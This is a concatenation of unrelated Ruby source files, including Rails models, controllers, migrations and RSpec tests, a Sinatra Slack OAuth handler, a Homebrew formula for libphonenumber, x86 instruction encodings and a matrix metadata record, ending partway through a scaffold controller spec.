end
end
end # <%= controller_name %>
| 24.775862 | 108 | 0.527488 |
f71287cec07ecb10437298afdfc40cd9ee5ed180 | 343 | module Amistad
module FriendshipModel
def self.included(receiver)
if receiver.ancestors.map(&:to_s).include?("ActiveRecord::Base")
receiver.class_exec do
include Amistad::ActiveRecordFriendshipModel
end
else
raise "Amistad only supports ActiveRecord and Mongoid"
end
end
end
end
| 24.5 | 70 | 0.676385 |
b9a6a312107b7f3b7da006c0869bc6058aa1c433 | 849 | class Web < Sinatra::Base
get '/' do
erb :web
end
get '/redirect' do
return if Bot&.instance && Bot.instance.client_started?
begin
log = Log.create
log.getting_token
web_client = Slack::Web::Client.new
rc = web_client.oauth_access(
client_id: configatron.slack.client_id,
client_secret: configatron.slack.client_secret,
code: params[:code]
)
token = rc['bot']['bot_access_token']
storage = Storage.instance
storage.token = token
Slack.configure do |config|
config.token = storage.token
end
client = Slack::RealTime::Client.new
Bot.create(client, storage, log)
log.success
rescue StandardError => e
log = Log.create
log.something_went_wrong(e)
end
end
end
| 22.342105 | 60 | 0.594817 |
e99ae11a53c27559a3ce61db467ad9a1ce47186c | 646 | module Nmax
## Storage class for storage sorted numbers
class Storage
def initialize(size:)
@sorted_storage = SortedSet.new
@size = size
end
def add(number)
return if @sorted_storage.include?(number)
if @sorted_storage.size < @size
@sorted_storage.add(number)
else
custom_add(number)
end
end
def each(&block)
@sorted_storage.each(&block)
end
private
def custom_add(number)
min_number = @sorted_storage.min
return unless min_number < number
@sorted_storage.delete(min_number)
@sorted_storage.add(number)
end
end
end
| 18.457143 | 48 | 0.637771 |
914ab7e42270b9d177073064e183eb458bb6fd4e | 1,315 | {
matrix_id: '1776',
name: 'stat96v5',
group: 'Meszaros',
description: 'linear programming problem, C. Meszaros test set',
author: '',
editor: 'C. Meszaros',
date: '2005',
kind: 'linear programming problem',
problem_2D_or_3D: '0',
num_rows: '2307',
num_cols: '75779',
nonzeros: '233921',
num_explicit_zeros: '0',
num_strongly_connected_components: '3',
num_dmperm_blocks: '3',
structural_full_rank: 'false',
structural_rank: '2305',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'real',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'http://www.sztaki.hu/~meszaros/public_ftp/lptestset
Converted to standard form via Resende and Veiga\'s mpsrd:
minimize c\'*x, subject to A*x=b and lo <= x <= hi
',
b_field: 'full 2307-by-1
',
aux_fields: 'c: full 75779-by-1
lo: full 75779-by-1
hi: full 75779-by-1
z0: full 1-by-1
', norm: '1.952339e+01',
min_singular_value: '0',
condition_number: 'Inf',
svd_rank: '2305',
sprank_minus_rank: '0',
null_space_dimension: '2',
full_numerical_rank: 'no',
svd_gap: 'Inf',
image_files: 'stat96v5.png,stat96v5_dmperm.png,stat96v5_scc.png,stat96v5_svd.png,stat96v5_graph.gif,',
}
| 29.222222 | 106 | 0.647148 |
d5aea3201f97fa6f762b225653f8be53d2694fba | 146 | # Be sure to restart your server when you modify this file.
Rails.application.config.session_store :cookie_store, key: '_nineties_slang_session'
| 36.5 | 84 | 0.815068 |
5d4fc59fb95afecaa69e47bcefa7cda7fd1c96b7 | 1,071 | # frozen_string_literal: true
require 'spec_helper'
require 'rubocop'
require 'rubocop/rspec/support'
require_relative '../../../../rubocop/cop/migration/add_column_with_default'
describe RuboCop::Cop::Migration::AddColumnWithDefault do
include CopHelper
let(:cop) { described_class.new }
context 'outside of a migration' do
it 'does not register any offenses' do
expect_no_offenses(<<~RUBY)
def up
add_column_with_default(:merge_request_diff_files, :artifacts, :boolean, default: true, allow_null: false)
end
RUBY
end
end
context 'in a migration' do
before do
allow(cop).to receive(:in_migration?).and_return(true)
end
let(:offense) { '`add_column_with_default` is deprecated, use `add_column` instead' }
it 'registers an offense ' do
expect_offense(<<~RUBY)
def up
add_column_with_default(:merge_request_diff_files, :artifacts, :boolean, default: true, allow_null: false)
^^^^^^^^^^^^^^^^^^^^^^^ #{offense}
end
RUBY
end
end
end
| 25.5 | 116 | 0.666667 |
e9e86c0d22b6803fb6c0fbbf830d05d4662a0a88 | 326 | class CreateRefunds < ActiveRecord::Migration
def change
create_table :refunds do |t|
t.integer :provider_id
t.integer :claimant_id
t.float :amount_requested
t.date :date_received
t.float :amount_received
t.date :date_posted
t.text :reason
t.timestamps
end
end
end
| 20.375 | 45 | 0.662577 |
9131dac5c84073e0f5f704b2a47f00c6410f44b0 | 652 | Rails.application.configure do
config.lograge.enabled = true
config.lograge.custom_options = lambda do |event|
{
pid: Process.pid,
ip: event.payload[:ip],
user: event.payload[:user],
time: event.time.utc.strftime("%Y-%m-%dT%H:%M:%SZ"),
params: event.payload[:params].except(*%w(controller action format id))
}
end
config.lograge.formatter = ->(data) {
"#{data[:time]} pid=#{data[:pid]} method=#{data[:method]} path=#{data[:path]} controller=#{data[:controller]}##{data[:action]} params=#{data[:params]} status=#{data[:status]} duration=#{data[:duration]}ms ip=#{data[:ip]} user=#{data[:user]}"
}
end
| 40.75 | 245 | 0.633436 |
ab19b15563a9188d8383a217197f4e556f31d940 | 677 | # Behaviors
class Behavior < ApplicationRecord
belongs_to :client
has_many :behavior_reports
validates :description, presence: true
attr_encryptor :description,
key: Rails.application.secrets.behavior_description_key,
algorithm: 'aes-256-cbc',
mode: :single_iv_and_salt,
insecure_mode: true
def report_count
behavior_reports.size
end
def occurrence_count
behavior_reports.collect(&:occurrences).sum
end
def timestamp
created_at.to_formatted_s(:long)
end
def updated_timestamp
updated_at.to_formatted_s(:long)
end
scope :active, -> { where(removed: false) }
end
| 21.83871 | 73 | 0.686854 |
397eaee068c2d495dc6246ed7fd3d78ac977a6ab | 4,777 | require 'spec_helper'
# Snippet visibility scenarios are included in more details in spec/support/snippet_visibility.rb
describe PersonalSnippetPolicy do
let(:regular_user) { create(:user) }
let(:external_user) { create(:user, :external) }
let(:admin_user) { create(:user, :admin) }
let(:author_permissions) do
[
:update_personal_snippet,
:admin_personal_snippet,
:destroy_personal_snippet
]
end
def permissions(user)
described_class.new(user, snippet)
end
context 'public snippet' do
let(:snippet) { create(:personal_snippet, :public) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
context 'internal snippet' do
let(:snippet) { create(:personal_snippet, :internal) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'external user' do
subject { permissions(external_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'snippet author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
context 'private snippet' do
let(:snippet) { create(:project_snippet, :private) }
context 'no user' do
subject { permissions(nil) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'regular user' do
subject { permissions(regular_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'admin user' do
subject { permissions(admin_user) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'external user' do
subject { permissions(external_user) }
it do
is_expected.to be_disallowed(:read_personal_snippet)
is_expected.to be_disallowed(:comment_personal_snippet)
is_expected.to be_disallowed(:award_emoji)
is_expected.to be_disallowed(*author_permissions)
end
end
context 'snippet author' do
subject { permissions(snippet.author) }
it do
is_expected.to be_allowed(:read_personal_snippet)
is_expected.to be_allowed(:comment_personal_snippet)
is_expected.to be_allowed(:award_emoji)
is_expected.to be_allowed(*author_permissions)
end
end
end
end
| 28.951515 | 97 | 0.694369 |
62f8add0264cc41a6e817da9a3224f4db6cf4c36 | 906 | require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
describe "an included module" do
module A
def foo
"foo"
end
end
module B; include A; end
module C; include B; end
module D; include B; end
it "should still be included after reincarnation" do
A.reincarnate
module A
def foo
super*2
end
end
class ATestB; include B; end
ATestB.new.foo.should == "foofoo"
class ATestC; include C; end
ATestC.new.foo.should == "foofoo"
class ATestD; include D; end
ATestD.new.foo.should == "foofoo"
A.reincarnate
module A
def foo
super + bar
end
end
module B; def bar; "B"; end; end
module C; def bar; "C"; end; end
module D; def bar; "D"; end; end
ATestB.new.foo.should == "foofooB"
ATestC.new.foo.should == "foofooC"
ATestD.new.foo.should == "foofooD"
end
end
| 19.276596 | 65 | 0.609272 |
ac5d55d2ab719c83193e3142fbb54d3e78c3707f | 3,188 | # frozen_string_literal: true
class Fisk
module Instructions
# Instruction VBROADCASTSD
forms = []
operands = []
encodings = []
# vbroadcastsd: ymm{k}{z}, xmm
operands << OPERAND_TYPES[59]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: zmm{k}{z}, xmm
operands << OPERAND_TYPES[62]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm{k}{z}, m64
operands << OPERAND_TYPES[59]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: zmm{k}{z}, m64
operands << OPERAND_TYPES[62]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_EVEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm, xmm
operands << OPERAND_TYPES[65]
operands << OPERAND_TYPES[24]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_VEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
3,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
operands = []
encodings = []
# vbroadcastsd: ymm, m64
operands << OPERAND_TYPES[65]
operands << OPERAND_TYPES[18]
encodings << Class.new(Fisk::Encoding) {
def encode buffer, operands
add_VEX buffer, operands
add_opcode buffer, 0x19, 0
add_modrm(buffer,
0,
operands[0].op_value,
operands[1].op_value, operands)
end
def bytesize; 2; end
}.new
forms << Form.new(operands, encodings)
VBROADCASTSD = Instruction.new("VBROADCASTSD", forms)
end
end
| 27.016949 | 57 | 0.576851 |
f8bf4124443145cf885ddb5900d98cdad320acce | 240 | module GymcloudAPI::V2
module Entities
class UserAuthentication < Grape::Entity
expose :id
expose :email
expose :provider do |auth|
auth.authentication_provider.name
end
expose :created_at
expose :updated_at
end
end
end
| 13.333333 | 40 | 0.754167 |
4a5a668cff394beafb5fe9c301be421001447160 | 908 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
test "should get home" do
get '#home'
assert_response :success
assert_select "title", "Ruby on Rails Tutorial Sample App"
end
test "should get help" do
get help_path
assert_response :success
assert_select "title", "Help | Ruby on Rails Tutorial Sample App"
end
test "should get about" do
get about_path
assert_response :success
assert_select "title", "About | Ruby on Rails Tutorial Sample App"
end
test "should get contact" do
get contact_path
assert_response :success
assert_select "title", "Contact | Ruby on Rails Tutorial Sample App"
end
test "should get signup" do
get signup_path
assert_response :success
assert_select "title", "Signup | Ruby on Rails Tutorial Sample App"
end
end
| 26.705882 | 72 | 0.711454 |
ff78f8b12059bd2ccddae61dc95e565309dc9df8 | 2,720 | description "Toolkit Kickstart"
# Stylesheets
file '../shared/style.scss', :like => :stylesheet, :media => 'screen, projection', :to => 'style.scss'
file '_base.scss', :like => :stylesheet, :to => 'partials/global/_base.scss'
file '../shared/_variables.scss', :like => :stylesheet, :to => 'partials/global/_variables.scss'
file '../shared/_functions.scss', :like => :stylesheet, :to => 'partials/global/_functions.scss'
file '../shared/_mixins.scss', :like => :stylesheet, :to => 'partials/global/_mixins.scss'
file '../shared/_extendables.scss', :like => :stylesheet, :to => 'partials/global/_extendables.scss'
file '../shared/_style-guide.scss', :like => :stylesheet, :to => 'partials/styleguide/_style-guide.scss'
file '../shared/_layout.scss', :like => :stylesheet, :to => 'partials/layout/_layout.scss'
file '../shared/_ie-layout.scss', :like => :stylesheet, :to => 'partials/layout/_ie-layout.scss'
file '../shared/_print-layout.scss', :like => :stylesheet, :to => 'partials/layout/_print-layout.scss'
file '../shared/_design.scss', :like => :stylesheet, :to => 'partials/design/_design.scss'
file '../shared/_ie-design.scss', :like => :stylesheet, :to => 'partials/design/_ie-design.scss'
file '../shared/_print-design.scss', :like => :stylesheet, :to => 'partials/design/_print-design.scss'
file '../shared/print.scss', :like => :stylesheet, :media => 'print', :to => 'print.scss'
file '../shared/ie.scss', :like => :stylesheet, :media => 'screen, projection', :condition => "lte IE 8", :to => 'ie.scss'
help %Q{
Please contact Sam Richard or Mason Wendell with questions:
[email protected]
[email protected]
}
welcome_message %Q{
Toolkit Kickstart
Welcome to Toolkit! Provided are the basic tools needed to kickstart a new Sass project tailor made to your needs! Remember, tools and best practices are always changing, so keep up to date!
The following is included in this build:
Compass Extensions:
* Toolkit
Include the following in your <head> tag:
<meta content='width=device-width, initial-scale=1.0' name='viewport' />
<meta content='IE=edge,chrome=1' http-equiv='X-UA-Compatible' />
<!--[if lt IE 9 ]> <script src="//ajax.googleapis.com/ajax/libs/chrome-frame/1.0.2/CFInstall.min.js"></script><script>window.attachEvent("onload",function(){CFInstall.check({mode:"overlay"})})</script> <![endif]-->
<!-- CSS -->
<link href='path/to/css/style.css?v=1' rel='stylesheet' />
<!-- All JavaScript at the bottom, except for Modernizr. -->
Include the following, and all other JavaScript, including any JavaScript frameworks you may be using like jQuery, right before your closing </body> tag:
<!-- Javascript at the bottom for fast page loading -->
}
| 46.896552 | 216 | 0.689338 |
5d1e6d0028ef43df63ef3b2b096eec6755f26f31 | 183 | # frozen_string_literal: true
class CreateJmxes < ActiveRecord::Migration[5.2]
def change
create_table :jmxes do |t|
t.string :name
t.timestamps
end
end
end
| 15.25 | 48 | 0.677596 |
3881179f74f3f6bbe78933137b5f7a18ac018270 | 1,181 | # encoding: utf-8
$:.push File.expand_path("../lib", __FILE__)
require "audited/version"
Gem::Specification.new do |gem|
gem.name = 'audited'
gem.version = Audited::VERSION
gem.authors = ['Brandon Keepers', 'Kenneth Kalmer', 'Daniel Morrison', 'Brian Ryckbost', 'Steve Richert', 'Ryan Glover']
gem.email = '[email protected]'
gem.description = 'Log all changes to your models'
gem.summary = gem.description
gem.homepage = 'https://github.com/collectiveidea/audited'
gem.license = 'MIT'
gem.add_dependency 'rails-observers', '~> 0.1.2'
gem.add_development_dependency "protected_attributes"
gem.add_development_dependency 'appraisal', '~> 1.0.0'
gem.add_development_dependency 'bson_ext', '~> 1.6'
gem.add_development_dependency 'mongo_mapper', '~> 0.13.0.beta2'
gem.add_development_dependency 'rails', '~> 4.0.0'
gem.add_development_dependency 'rspec-rails', '~> 3.0'
gem.add_development_dependency 'sqlite3', '~> 1.0'
gem.files = `git ls-files`.split($\).reject{|f| f =~ /(\.gemspec|lib\/audited\-|adapters|generators)/ }
gem.test_files = gem.files.grep(/^spec\//)
gem.require_paths = ['lib']
end
| 39.366667 | 126 | 0.684166 |
62152c327ab240aacc893942099611d6a86d3511 | 554 | # frozen_string_literal: true
FactoryBot.define do
factory :naive_mooc_provider_user, class: 'MoocProviderUser' do
association :user_id, factory: :user
association :mooc_provider_id, factory: :mooc_provider
sequence(:access_token) {|n| "token#{n}" }
end
factory :oauth_mooc_provider_user, class: 'MoocProviderUser' do
association :user_id, factory: :user
association :mooc_provider_id, factory: :mooc_provider
sequence(:access_token) {|n| "token#{n}" }
access_token_valid_until { Time.zone.now + 5.minutes }
end
end
| 32.588235 | 65 | 0.738267 |
6aad2d1c0cb7ec09b365d6de0e5c2f70cf79b684 | 508 | require 'net/http'
require 'uri'
module Api::V1::UserHelper
TOKEN = ''
def transaction_result?(amount:, destination:)
url = 'http://api.goldbank.ru/transfer'
query = {
amount: amount,
currency: 'USD',
destination: destination,
token: TOKEN
}
RestClient.post(url, query){|response, request, result| response
case response.code
when 200
true
else
false
end}
end
end
| 18.142857 | 68 | 0.535433 |
21f8c2708024df6dffecb77844cfc6f75526679b | 677 | class SessionsController < ApplicationController
def new
end
def create
user = User.find_by(email: params[:session][:email].downcase)
if user && user.authenticate(params[:session][:password])
if user.activated?
log_in user
params[:session][:remember_me] == '1' ? remember(user) : forget(user)
redirect_back_or user
else
flash[:danger] = 'Account not activated, Check your email for the activation link.'
redirect_to root_url
end
else
flash.now[:danger] = 'Email or password is wrong!'
render 'new'
end
end
def destroy
log_out if log_in?
redirect_to root_path
end
end
| 23.344828 | 91 | 0.648449 |
5d9a45b9a77c0a8482faa3eab3f4f52e4271310d | 843 | # frozen_string_literal: true
module SolidusShipstation
module Api
class ThresholdVerifier
class << self
def call(shipment)
return false unless shipment.order.completed?
!!(shipment_requires_creation?(shipment) || shipment_requires_update?(shipment))
end
private
def shipment_requires_creation?(shipment)
shipment.shipstation_synced_at.nil? &&
Time.zone.now - shipment.order.updated_at < SolidusShipstation.config.api_sync_threshold
end
def shipment_requires_update?(shipment)
shipment.shipstation_synced_at &&
shipment.shipstation_synced_at < shipment.order.updated_at &&
Time.zone.now - shipment.order.updated_at < SolidusShipstation.config.api_sync_threshold
end
end
end
end
end
| 29.068966 | 100 | 0.680902 |
5dbb6004209eba0688892000165e4220d13d5c03 | 283 | def intersection(nums1, nums2)
lookup_table = Array.new(1001, nil)
nums1.each { |num| lookup_table[num] = true }
intersection = []
nums2.each do |num|
if lookup_table[num] == true
intersection << num
lookup_table[num] = false
end
end
intersection
end
| 21.769231 | 47 | 0.657244 |
e810529af1822082131b080e579f7760c4339717 | 2,171 | class Libphonenumber < Formula
desc "C++ Phone Number library by Google"
homepage "https://github.com/google/libphonenumber"
url "https://github.com/google/libphonenumber/archive/v8.12.20.tar.gz"
sha256 "a318a40272587305c2e2d6f0663c06f6d7bdb0d0be0877bfd67518a3cdfffe33"
license "Apache-2.0"
livecheck do
url :stable
strategy :github_latest
end
bottle do
sha256 cellar: :any, arm64_big_sur: "833d131c18e4075266e9a7d036aed634ee6afed3b60adfcdab544a2603ce5c72"
sha256 cellar: :any, big_sur: "3da794404f364641ced3615e97acfda547a86c112dd4d3569fd5453522473ab7"
sha256 cellar: :any, catalina: "ddc9ddb6c2178af9c4772e2563c728696b2ac59e36f02fe55d8b52964c6e9f00"
sha256 cellar: :any, mojave: "d9503ced2ea7c11cdea1e6c150aa0be98ef57164a5e5893bb90aba0b79e3e930"
sha256 cellar: :any_skip_relocation, x86_64_linux: "aecbd5a168b921a093277129733d409839858c93623de1ae86a2d88e74ecea53"
end
depends_on "cmake" => :build
depends_on "googletest" => :build
depends_on "boost"
depends_on "icu4c"
depends_on "protobuf"
depends_on "re2"
def install
ENV.cxx11
system "cmake", "cpp", "-DGTEST_INCLUDE_DIR=#{Formula["googletest"].include}",
*std_cmake_args
system "make", "install"
end
test do
(testpath/"test.cpp").write <<~EOS
#include <phonenumbers/phonenumberutil.h>
#include <phonenumbers/phonenumber.pb.h>
#include <iostream>
#include <string>
using namespace i18n::phonenumbers;
int main() {
PhoneNumberUtil *phone_util_ = PhoneNumberUtil::GetInstance();
PhoneNumber test_number;
string formatted_number;
test_number.set_country_code(1);
test_number.set_national_number(6502530000ULL);
phone_util_->Format(test_number, PhoneNumberUtil::E164, &formatted_number);
if (formatted_number == "+16502530000") {
return 0;
} else {
return 1;
}
}
EOS
system ENV.cxx, "-std=c++11", "test.cpp", "-L#{lib}", "-lphonenumber", "-o", "test"
system "./test"
end
end
| 35.016129 | 122 | 0.676647 |
918262a1fd6bd7cb3497d8208dea281efcffc45b | 2,018 | ###############################################################################
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
class User < ActiveRecord::Base
attr_accessible :email, :name, :provider, :uid
has_many :tags
def self.create_with_omniauth(request, auth)
session_info = self.check_session(request, auth)
create! do |user|
user.provider = auth["provider"]
user.full_name = session_info["full_name"]
user.realm = session_info["realm"]
user.tenant_id = session_info["tenantId"]
user.user_id = session_info["user_id"]
user.external_id = session_info["external_id"]
user.email = session_info["email"]
end
end
def self.get_authed_user(request, auth)
session_info = self.check_session(request, auth)
User.find_by_provider_and_user_id(auth["provider"], session_info["user_id"]) || User.create_with_omniauth(request, auth)
end
private
def self.check_session(request, auth)
path = 'https://api.sandbox.inbloom.org/api/rest/system/session/check'
headers = { "Accept" => 'application/vnd.slc+json',
"Content-Type" => 'application/vnd.slc+json',
"Authorization" => "bearer #{auth[:credentials][:token]}" }
slc_response = HTTParty.send(request.method.underscore.to_sym, path, :headers => headers)
return JSON.parse(slc_response)
end
end | 38.075472 | 124 | 0.650644 |
9193d2ee3dd6b83db94e3c485c2668642e2671c7 | 1,860 | require 'shopify_cli'
module ShopifyCli
module Commands
class Connect < ShopifyCli::Command
class << self
def call(args, command_name)
ProjectType.load_type(args[0]) unless args.empty?
super
end
def help
ShopifyCli::Context.message('core.connect.help', ShopifyCli::TOOL_NAME)
end
end
def call(args, command_name)
if Project.current&.env
@ctx.puts(@ctx.message('core.connect.already_connected_warning'))
end
project_type = ask_project_type
klass = ProjectType.load_type(project_type)&.connect_command
if klass
klass.ctx = @ctx
klass.call(args, command_name, 'connect')
else
app = default_connect(project_type)
@ctx.done(@ctx.message('core.connect.connected', app))
end
end
def ask_project_type
CLI::UI::Prompt.ask(@ctx.message('core.connect.project_type_select')) do |handler|
ShopifyCli::Commands::Create.all_visible_type.each do |type|
handler.option(type.project_name) { type.project_type }
end
end
end
def default_connect(project_type)
org = ShopifyCli::Tasks::EnsureEnv.call(@ctx, regenerate: true)
write_cli_yml(project_type, org['id']) unless Project.has_current?
api_key = Project.current(force_reload: true).env['api_key']
get_app(org['apps'], api_key).first['title']
end
def write_cli_yml(project_type, org_id)
ShopifyCli::Project.write(
@ctx,
project_type: project_type,
organization_id: org_id,
)
@ctx.done(@ctx.message('core.connect.cli_yml_saved'))
end
def get_app(apps, api_key)
apps.select { |app| app["apiKey"] == api_key }
end
end
end
end
| 28.615385 | 90 | 0.615591 |
bb9128639614a6b95e5facf9fda45a0d2e8c64a6 | 693 | require './config/environment'
class ApplicationController < Sinatra::Base
configure do
set :public_folder, 'public'
set :views, 'app/views'
enable :sessions
set :session_secret, "my_app_secret"
register Sinatra::Flash
end
get "/" do
erb :'welcome'
end
helpers do
def logged_in?
!!current_user
end
def current_user
@current_user ||= CareGiver.find_by(id: session[:care_giver_id]) if session[:care_giver_id]
end
end
def authorized_to_edit?(daily_activity)
daily_activity.care_giver == current_user
end
def set_daily_activity
@daily_activity = DailyActivity.find_by(id: params[:id])
end
end
| 16.5 | 98 | 0.676768 |
1836618c064200bd1604bc0a0f6d9fcb4fbf67fe | 1,558 | =begin
#Topological Inventory Ingress API
#Topological Inventory Ingress API
The version of the OpenAPI document: 0.0.2
Contact: [email protected]
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.2.0
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe 'InventoryCollectionVmSecurityGroup' do
before do
# run before each test
@instance = TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup.new
end
after do
# run after each test
end
describe 'test an instance of InventoryCollectionVmSecurityGroup' do
it 'should create an instance of InventoryCollectionVmSecurityGroup' do
expect(@instance).to be_instance_of(TopologicalInventoryIngressApiClient::InventoryCollectionVmSecurityGroup)
end
end
describe 'test attribute "name"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "data"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "partial_data"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
| 28.851852 | 115 | 0.766367 |
613efd9de9777b955193d79da33c2d5efee4a18e | 5,789 | require 'spec_helper'
# This spec was generated by rspec-rails when you ran the scaffold generator.
# It demonstrates how one might use RSpec to specify the controller code that
# was generated by Rails when you ran the scaffold generator.
#
# It assumes that the implementation code is generated by the rails scaffold
# generator. If you are using any extension libraries to generate different
# controller code, this generated spec may or may not pass.
#
# It only uses APIs available in rails and/or rspec-rails. There are a number
# of tools you can use to make these specs even more expressive, but we're
# sticking to rails and rspec-rails APIs to keep things simple and stable.
#
# Compared to earlier versions of this generator, there is very limited use of
# stubs and message expectations in this spec. Stubs are only used when there
# is no simpler way to get a handle on the object needed for the example.
# Message expectations are only used when there is no simpler way to specify
# that an instance is receiving a specific message.
describe AppsController do
before do
pwd = 'cloud$'
@user = User.create! :first_name => 'Dale', :last_name => 'Olds', :display_name => 'Dale O.', :password => pwd, :confirm_password => pwd, :email => '[email protected]'
sign_in @user
end
# This should return the minimal set of attributes required to create a valid
# App. As you add validations to App, be sure to
# update the return value of this method accordingly.
def valid_attributes
{ :display_name => 'Transcoder', :creator => @user, :project => @user.personal_org.default_project, :url => "trans.cloudfoundry.com"}
end
describe "GET index" do
it "assigns all apps as @apps" do
app = App.create! valid_attributes
get :index
assigns(:apps).should eq([app])
end
end
describe "GET show" do
it "assigns the requested app as @app" do
app = App.create! valid_attributes
get :show, :id => app.id.to_s
assigns(:app).should eq(app)
end
end
describe "GET new" do
it "assigns a new app as @app" do
get :new
assigns(:app).should be_a_new(App)
end
end
describe "GET import" do
it "does not import any apps and redirects to the oauth authorization page for cloudfoundry" do
get :import
response.should redirect_to "/users/auth/cloudfoundry"
end
end
describe "GET edit" do
it "assigns the requested app as @app" do
app = App.create! valid_attributes
get :edit, :id => app.id.to_s
assigns(:app).should eq(app)
end
end
describe "POST create" do
describe "with valid params" do
it "creates a new App" do
expect {
post :create, :app => valid_attributes
}.to change(App, :count).by(1)
end
it "assigns a newly created app as @app" do
post :create, :app => valid_attributes
assigns(:app).should be_a(App)
assigns(:app).should be_persisted
end
it "redirects to the created app" do
post :create, :app => valid_attributes
response.should redirect_to(App.last)
end
end
describe "with invalid params" do
it "assigns a newly created but unsaved app as @app" do
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
post :create, :app => {}
assigns(:app).should be_a_new(App)
end
it "re-renders the 'new' template" do
# Trigger the behavior that occurs when invalid params are submitted
App.any_instance.stub(:save).and_return(false)
post :create, :app => {}
response.should render_template("new")
end
end
end
describe "PUT update" do
describe "with valid params" do
it "updates the requested app" do
app = App.create! valid_attributes
# Assuming there are no other apps in the database, this
# specifies that the App created on the previous line
# receives the :update_attributes message with whatever params are
# submitted in the request.
App.any_instance.should_receive(:update_attributes).with({'these' => 'params'})
put :update, :id => app.id, :app => {'these' => 'params'}
end
it "assigns the requested app as @app" do
app = App.create! valid_attributes
put :update, :id => app.id, :app => valid_attributes
assigns(:app).should eq(app)
end
it "redirects to the app" do
app = App.create! valid_attributes
put :update, :id => app.id, :app => valid_attributes
response.should redirect_to(app)
end
end
describe "with invalid params" do
it "assigns the app as @app" do
app = App.create! valid_attributes
